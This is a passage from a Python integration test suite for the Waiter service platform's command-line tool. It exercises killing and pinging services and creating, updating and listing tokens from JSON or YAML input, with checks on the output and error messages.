util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, flags="-v", kill_flags="--ping")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertIn(service_id, cli.stdout(cp))
self.assertIn('Successfully killed', cli.stdout(cp))
self.assertIn('timeout=30000', cli.stderr(cp))
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('Ping successful', cli.stdout(cp))
self.assertEqual(1, len(util.wait_until_services_for_token(self.waiter_url, token_name, 1)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_no_services(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
cp = cli.kill(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('There are no services using token', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_kill_timeout(self):
timeout = 10
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, flags="-v", kill_flags=f"--timeout {timeout}")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertIn(service_id, cli.stdout(cp))
self.assertIn('Successfully killed', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
self.assertIn(f'timeout={timeout * 1000}', cli.stderr(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_kill_multiple_services(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id_1 = util.ping_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
service_id_2 = util.ping_token(self.waiter_url, token_name)
self.assertEqual(2, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, token_name, kill_flags='--force')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('There are 2 services using token', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Killing service'))
self.assertEqual(2, cli.stdout(cp).count('Successfully killed'))
self.assertIn(service_id_1, cli.stdout(cp))
self.assertIn(service_id_2, cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
@pytest.mark.xfail
def test_kill_services_sorted(self):
token_name = self.token_name()
service_description_1 = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, service_description_1)
try:
# Create two services for the token
service_id_1 = util.ping_token(self.waiter_url, token_name)
service_description_2 = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, service_description_2)
service_id_2 = util.ping_token(self.waiter_url, token_name)
# Kill the two services and assert the sort order
cp = cli.kill(self.waiter_url, token_name, kill_flags='--force')
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(service_id_1, stdout)
self.assertIn(service_id_2, stdout)
self.assertLess(stdout.index(service_id_2), stdout.index(service_id_1))
self.assertNotIn('Pinging service', stdout)
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_routers_recognize_service_killed(self.waiter_url, service_id_1)
util.wait_until_routers_recognize_service_killed(self.waiter_url, service_id_2)
# Re-create the same two services, in the opposite order
util.post_token(self.waiter_url, token_name, service_description_2)
util.ping_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, service_description_1)
util.ping_token(self.waiter_url, token_name)
# Kill the two services and assert the (different) sort order
cp = cli.kill(self.waiter_url, token_name, kill_flags='--force')
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(service_id_1, stdout)
self.assertIn(service_id_2, stdout)
self.assertLess(stdout.index(service_id_1), stdout.index(service_id_2))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_timeout(self):
token_name = self.token_name()
command = f'{util.default_cmd()} --start-up-sleep-ms 20000'
util.post_token(self.waiter_url, token_name, util.minimal_service_description(cmd=command))
try:
cp = cli.ping(self.waiter_url, token_name, ping_flags='--timeout 300')
self.assertEqual(0, cp.returncode, cp.stderr)
util.kill_services_using_token(self.waiter_url, token_name)
cp = cli.ping(self.waiter_url, token_name, ping_flags='--timeout 10')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertTrue(
# Either Waiter will inform us that the ping timed out
'Ping request timed out' in cli.stderr(cp) or
# Or, the read from Waiter will time out
'Encountered error while pinging' in cli.stderr(cp))
finally:
util.kill_services_using_token(self.waiter_url, token_name)
util.delete_token(self.waiter_url, token_name)
def test_ping_service_id(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
util.kill_services_using_token(self.waiter_url, token_name)
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, service_id, ping_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Pinging service', cli.stdout(cp))
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_invalid_args(self):
cp = cli.ping(self.waiter_url)
self.assertEqual(2, cp.returncode, cp.stderr)
self.assertIn('the following arguments are required: token-or-service-id', cli.stderr(cp))
def test_ping_correct_endpoint(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name,
util.minimal_service_description(**{'health-check-url': '/sleep'}))
try:
# Grab the service id for the /sleep version
service_id = util.ping_token(self.waiter_url, token_name)
# Update the health check url to /status
util.post_token(self.waiter_url, token_name,
util.minimal_service_description(**{'health-check-url': '/status'}))
# Pinging the token should use /status
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
# Pinging the service id should use /sleep
cp = cli.ping(self.waiter_url, service_id, ping_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ping_no_wait(self):
token_name = self.token_name()
command = f'{util.default_cmd()} --start-up-sleep-ms {util.DEFAULT_TEST_TIMEOUT_SECS * 2 * 1000}'
util.post_token(self.waiter_url, token_name, util.minimal_service_description(cmd=command))
try:
cp = cli.ping(self.waiter_url, token_name, ping_flags='--no-wait')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Service is currently Starting', cli.stdout(cp))
services_for_token = util.wait_until_services_for_token(self.waiter_url, token_name, 1)
service_id = services_for_token[0]['service-id']
util.kill_services_using_token(self.waiter_url, token_name)
cp = cli.ping(self.waiter_url, service_id, ping_flags='--service-id --no-wait')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Service is currently Starting', cli.stdout(cp))
util.wait_until_services_for_token(self.waiter_url, token_name, 1)
util.kill_services_using_token(self.waiter_url, token_name)
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'cmd-type': 'shell'})
cp = cli.ping(self.waiter_url, token_name, ping_flags='--no-wait')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertNotIn('Service is currently', cli.stdout(cp))
self.assertIn('Service description', cli.decode(cp.stderr))
self.assertIn('improper', cli.decode(cp.stderr))
self.assertIn('cmd must be a non-empty string', cli.decode(cp.stderr))
self.assertIn('version must be a non-empty string', cli.decode(cp.stderr))
self.assertIn('mem must be a positive number', cli.decode(cp.stderr))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.kill_services_using_token(self.waiter_url, token_name)
util.delete_token(self.waiter_url, token_name)
def test_ping_deployment_errors(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description(**{'cmd': 'asdfasdfafsdhINVALIDCOMMAND'}))
try:
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.ping(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Pinging token', cli.stdout(cp))
self.assertIn('Ping responded with non-200 status 503.', cli.stderr(cp))
self.assertIn('Deployment error: Invalid startup command', cli.stderr(cp))
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_create_does_not_patch(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp = cli.create_from_service_description(self.waiter_url, token_name, {'mem': 128})
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertFalse('cpus' in token_data)
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_does_patch(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1})
try:
cp = cli.update_from_service_description(self.waiter_url, token_name, {'mem': 128})
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def __test_create_token(self, file_format, input_flag=None):
if input_flag is None:
input_flag = file_format
create_fields = {'cpus': 0.1, 'mem': 128}
stdin = cli.dump(file_format, create_fields)
token_name = self.token_name()
cp = cli.create(self.waiter_url, token_name, create_flags=f'--{input_flag} -', stdin=stdin)
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
# Test with data from a file
util.delete_token(self.waiter_url, token_name)
with cli.temp_token_file(create_fields, file_format) as path:
cp = cli.create(self.waiter_url, token_name, create_flags=f'--{input_flag} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_token_json(self):
self.__test_create_token('json')
def test_create_token_yaml(self):
self.__test_create_token('yaml')
def test_create_token_json_input(self):
self.__test_create_token('json', 'input')
def test_create_token_yaml_input(self):
self.__test_create_token('yaml', 'input')
def __test_update_token(self, file_format):
token_name = self.token_name()
create_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'}
update_fields = {'cpus': 0.2, 'mem': 256}
util.post_token(self.waiter_url, token_name, create_fields)
try:
stdin = cli.dump(file_format, update_fields)
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} -', stdin=stdin)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
# Test with data from a file
util.post_token(self.waiter_url, token_name, create_fields)
with cli.temp_token_file(update_fields, file_format) as path:
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json(self):
self.__test_update_token('json')
def test_update_token_yaml(self):
self.__test_update_token('yaml')
def __test_post_token_and_flags(self, file_format):
token_name = self.token_name()
update_fields = {'cpus': 0.2, 'mem': 256}
with cli.temp_token_file(update_fields, file_format) as path:
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --cpus 0.1')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the same parameter in both an input file and token field flags at the '
'same time (cpus)', cli.stderr(cp))
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --mem 128')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the same parameter in both an input file and token field flags at the '
'same time (mem)', cli.stderr(cp))
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --cpus 0.1 --mem 128')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the same parameter in both an input file and token field flags',
cli.stderr(cp))
self.assertIn('cpus', cli.stderr(cp))
self.assertIn('mem', cli.stderr(cp))
try:
cp = cli.update(self.waiter_url, token_name,
update_flags=f'--{file_format} {path} --name foo --image bar')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['name'])
self.assertEqual('bar', token_data['image'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_post_token_json_and_flags(self):
self.__test_post_token_and_flags('json')
def test_post_token_yaml_and_flags(self):
self.__test_post_token_and_flags('yaml')
def __test_post_token_invalid(self, file_format):
token_name = self.token_name()
stdin = json.dumps([]).encode('utf8')
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} -', stdin=stdin)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'Input {file_format.upper()} must be a dictionary', cli.stderr(cp))
stdin = '{"mem": 128'.encode('utf8')
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} -', stdin=stdin)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'Malformed {file_format.upper()}', cli.stderr(cp))
with tempfile.NamedTemporaryFile(delete=True) as file:
cp = cli.update(self.waiter_url, token_name, update_flags=f'--{file_format} {file.name}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'Unable to load {file_format.upper()} from', cli.stderr(cp))
def test_post_token_json_invalid(self):
self.__test_post_token_invalid('json')
def test_post_token_yaml_invalid(self):
self.__test_post_token_invalid('yaml')
def test_kill_service_id(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, service_id, kill_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Killing service', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
util.wait_until_no_services_for_token(self.waiter_url, token_name)
finally:
util.delete_token(self.waiter_url, token_name)
def test_kill_bogus_service_id(self):
cp = cli.kill(self.waiter_url, uuid.uuid4(), kill_flags='--service-id')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
def test_kill_inactive_service_id(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
util.kill_services_using_token(self.waiter_url, token_name)
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, service_id, kill_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('cannot be killed because it is already Inactive', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def __test_init_basic(self, file_format):
token_name = self.token_name()
filename = str(uuid.uuid4())
flags = f"--cmd '{util.default_cmd()}' --cmd-type shell --health-check-url /status " \
f"--name {token_name} --{file_format} --file {filename} "
cp = cli.init(self.waiter_url, init_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Writing token {file_format.upper()}', cli.stdout(cp))
try:
token_definition = util.load_file(file_format, filename)
self.logger.info(f'Token definition: {cli.dump(file_format, token_definition)}')
util.post_token(self.waiter_url, token_name, token_definition)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertEqual(token_name, token['name'])
self.assertEqual('your-metric-group', token['metric-group'])
self.assertEqual('shell', token['cmd-type'])
self.assertEqual(util.default_cmd(), token['cmd'])
self.assertEqual('your version', token['version'])
self.assertEqual(0.1, token['cpus'])
self.assertEqual(2048, token['mem'])
self.assertEqual('/status', token['health-check-url'])
self.assertEqual(120, token['concurrency-level'])
self.assertEqual('*', token['permitted-user'])
self.assertEqual(getpass.getuser(), token['run-as-user'])
util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
finally:
os.remove(filename)
def test_init_basic_json(self):
self.__test_init_basic('json')
def test_init_basic_yaml(self):
self.__test_init_basic('yaml')
def test_implicit_init_args(self):
cp = cli.init(init_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('--cpus', cli.stdout(cp))
self.assertNotIn('--https-redirect', cli.stdout(cp))
self.assertNotIn('--fallback-period-secs', cli.stdout(cp))
self.assertNotIn('--idle-timeout-mins', cli.stdout(cp))
self.assertNotIn('--max-instances', cli.stdout(cp))
self.assertNotIn('--restart-backoff-factor', cli.stdout(cp))
token_name = self.token_name()
with tempfile.NamedTemporaryFile(delete=True) as file:
init_flags = (
'--cmd-type shell '
'--https-redirect true '
'--cpus 0.1 '
'--fallback-period-secs 10 '
'--idle-timeout-mins 1 '
'--max-instances 100 '
'--restart-backoff-factor 1.1 '
f'--file {file.name} '
'--force')
cp = cli.init(self.waiter_url, init_flags=init_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_definition = util.load_file('json', file.name)
self.logger.info(f'Token definition: {json.dumps(token_definition, indent=2)}')
util.post_token(self.waiter_url, token_name, token_definition)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertEqual('your command', token['cmd'])
self.assertEqual('shell', token['cmd-type'])
self.assertEqual('your version', token['version'])
self.assertEqual(0.1, token['cpus'])
self.assertEqual(2048, token['mem'])
self.assertTrue(token['https-redirect'])
self.assertEqual(10, token['fallback-period-secs'])
self.assertEqual(1, token['idle-timeout-mins'])
self.assertEqual(100, token['max-instances'])
self.assertEqual(1.1, token['restart-backoff-factor'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_init_existing_file(self):
with tempfile.NamedTemporaryFile(delete=True) as file:
self.assertTrue(os.path.isfile(file.name))
cp = cli.init(self.waiter_url, init_flags=f"--cmd '{util.default_cmd()}' --file {file.name}")
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('There is already a file', cli.stderr(cp))
cp = cli.init(self.waiter_url, init_flags=f"--cmd '{util.default_cmd()}' --file {file.name} --force")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Writing token JSON', cli.stdout(cp))
@pytest.mark.xfail
def test_show_services_using_token(self):
token_name = self.token_name()
custom_fields = {
'permitted-user': getpass.getuser(),
'run-as-user': getpass.getuser(),
'cpus': 0.1,
'mem': 128
}
service_description_1 = util.minimal_service_description(**custom_fields)
util.post_token(self.waiter_url, token_name, service_description_1)
try:
# Create 2 services, 1 running and 1 failing due to a bad command
service_id_1 = util.ping_token(self.waiter_url, token_name)
custom_fields['cmd'] = 'exit 1'
custom_fields['cpus'] = 0.2
custom_fields['mem'] = 256
service_description_2 = util.minimal_service_description(**custom_fields)
util.post_token(self.waiter_url, token_name, service_description_2)
service_id_2 = util.ping_token(self.waiter_url, token_name, expected_status_code=503)
# Run show with --json
cp, services = cli.show_token_services('json', self.waiter_url, token_name=token_name)
self.logger.info(f'Services: {json.dumps(services, indent=2)}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(services), services)
service_1 = next(s for s in services if s['service-id'] == service_id_1)
service_2 = next(s for s in services if s['service-id'] == service_id_2)
self.assertEqual(service_description_1, service_1['service-description'])
self.assertEqual(service_description_2, service_2['service-description'])
self.assertEqual('Running', service_1['status'])
self.assertIn(service_2['status'], ['Failing', 'Starting'])
# Run show without --json
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIsNotNone(re.search('^# Services\\s+2$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^# Failing\\s+([01])$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^# Instances\\s+([12])$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^Total Memory\\s+(128|384) MiB$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^Total CPUs\\s+0\\.([13])$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_1}.+Running.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_2}.+(Failing|Starting).+Current$',
cli.stdout(cp), re.MULTILINE))
# Run show without --json and with --no-services
cp = cli.show(self.waiter_url, token_name, show_flags='--no-services')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertNotIn('# Services', cli.stdout(cp))
self.assertNotIn('# Failing', cli.stdout(cp))
self.assertNotIn('# Instances', cli.stdout(cp))
self.assertNotIn('Total Memory', cli.stdout(cp))
self.assertNotIn('Total CPUs', cli.stdout(cp))
self.assertNotIn(service_id_1, cli.stdout(cp))
self.assertNotIn(service_id_2, cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_tokens_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
# Ensure that tokens lists our token
cp, tokens = cli.tokens_data(self.waiter_url)
token_data = next(t for t in tokens if t['token'] == token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertFalse(token_data['deleted'])
self.assertFalse(token_data['maintenance'])
# Delete the token
util.delete_token(self.waiter_url, token_name)
# Ensure that tokens does not list our token
cp, tokens = cli.tokens_data(self.waiter_url)
# The CLI returns 0 if there are any tokens
# owned by the user and 1 if there are none
self.assertIn(cp.returncode, [0, 1], cp.stderr)
self.assertFalse(any(t['token'] == token_name for t in tokens))
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def __test_tokens_maintenance(self, expected_maintenance_value, service_config={}):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description(**service_config))
try:
cp = cli.tokens(self.waiter_url)
stdout = cli.stdout(cp)
lines = stdout.split('\n')
title_line = lines[0]
maintenance_index = title_line.index('Maintenance')
line_with_token = next(line for line in lines if token_name in line)
token_maintenance = line_with_token[maintenance_index:maintenance_index + len(expected_maintenance_value)]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(token_maintenance, expected_maintenance_value)
finally:
util.delete_token(self.waiter_url, token_name)
def test_tokens_token_in_maintenance(self):
service_config = {"maintenance": {"message": "custom message"}}
self.__test_tokens_maintenance("True", service_config=service_config)
def test_tokens_token_not_in_maintenance(self):
self.__test_tokens_maintenance("False")
def test_tokens_sorted(self):
token_name_prefix = self.token_name()
token_name_1 = f'{token_name_prefix}_foo'
util.post_token(self.waiter_url, token_name_1, util.minimal_service_description())
try:
token_name_2 = f'{token_name_prefix}_bar'
util.post_token(self.waiter_url, token_name_2, util.minimal_service_description())
try:
cp = cli.tokens(self.waiter_url)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(token_name_1, stdout)
self.assertIn(token_name_2, stdout)
self.assertLess(stdout.index(token_name_2), stdout.index(token_name_1))
finally:
util.delete_token(self.waiter_url, token_name_2)
finally:
util.delete_token(self.waiter_url, token_name_1)
def __test_create_token_containing_token_name(self, file_format):
token_name = self.token_name()
with cli.temp_token_file({'token': token_name, 'cpus': 0.1, 'mem': 128}, file_format) as path:
cp = cli.create(self.waiter_url, create_flags=f'--{file_format} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_token_json_containing_token_name(self):
self.__test_create_token_containing_token_name('json')
def test_create_token_yaml_containing_token_name(self):
self.__test_create_token_containing_token_name('yaml')
def test_create_nested_args_no_override(self):
token_name = self.token_name()
try:
create_flags = f'{token_name} --metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
cp = cli.create(self.waiter_url, flags='--verbose', create_flags=create_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual({'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_env_metadata_are_parsed_as_strings(self):
token_name = self.token_name()
try:
create_flags = f'{token_name} --metadata.instances 5 --env.KEY_2 true --env.KEY_3 false'
cp = cli.create(self.waiter_url, flags='--verbose', create_flags=create_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual({'KEY_2': 'true',
'KEY_3': 'false'},
token_data['env'])
self.assertEqual({'instances': '5'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def __test_create_nested_args_parameter_override_success(self, file_format, create_existing_token=False):
token_name = self.token_name()
create_doc = {'token': token_name,
'cpus': 0.2,
'env': {'KEY_1': 'value_1',
'KEY_2': 'value_2'}}
if create_existing_token:
util.post_token(self.waiter_url, token_name, {'env': {'key': 'should_be_overridden'}})
try:
with cli.temp_token_file(create_doc, file_format) as path:
explicit_create_flags = '--metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
create_flags = f'--override {explicit_create_flags} --{file_format} {path}'
cp = cli.create(self.waiter_url, flags='--verbose', create_flags=create_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual({'KEY_1': 'value_1',
'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_nested_args_json_parameter_override_success(self):
self.__test_create_nested_args_parameter_override_success('json')
def test_create_nested_args_yaml_parameter_override_success(self):
self.__test_create_nested_args_parameter_override_success('yaml')
def test_create_nested_args_parameter_override_success_with_existing_token(self):
self.__test_create_nested_args_parameter_override_success('json', create_existing_token=True)
def __test_update_token_containing_token_name(self, file_format):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
with cli.temp_token_file({'token': token_name, 'cpus': 0.2, 'mem': 256}, file_format) as path:
cp = cli.update(self.waiter_url, update_flags=f'--{file_format} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_containing_token_name(self):
self.__test_update_token_containing_token_name('json')
def test_update_token_yaml_containing_token_name(self):
self.__test_update_token_containing_token_name('yaml')
def __test_update_token_override_fail(self, file_format):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
with cli.temp_token_file({'token': token_name, 'cpus': 0.2, 'mem': 256}, file_format) as path:
cp = cli.update(self.waiter_url, update_flags=f'--cpus 0.3 --{file_format} {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = 'You cannot specify the same parameter in both an input file ' \
'and token field flags at the same time'
self.assertIn(err_msg, stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_override_fail(self):
self.__test_update_token_override_fail('json')
def test_update_token_yaml_override_fail(self):
self.__test_update_token_override_fail('yaml')
def __test_update_token_override_success(self, file_format, diff_token_in_file):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
token_in_file = f'abc_{token_name}' if diff_token_in_file else token_name
with cli.temp_token_file({'token': token_in_file, 'cpus': 0.2, 'mem': 256}, file_format) as path:
update_flags = f'--override --cpus 0.3 --{file_format} {path}'
if diff_token_in_file:
update_flags = f'{update_flags} {token_name}'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.3, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_parameter_override_success(self):
self.__test_update_token_override_success('json', False)
def test_update_token_yaml_parameter_override_success(self):
self.__test_update_token_override_success('yaml', False)
def test_update_token_json_token_override_success(self):
self.__test_update_token_override_success('json', True)
def test_update_token_yaml_token_override_success(self):
self.__test_update_token_override_success('yaml', True)
def __test_update_token_override_failure(self, file_format, diff_token_in_file, update_flags="--cpus 0.3"):
token_name = self.token_name()
token_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo', 'env': {'FOO': 'BAR'}}
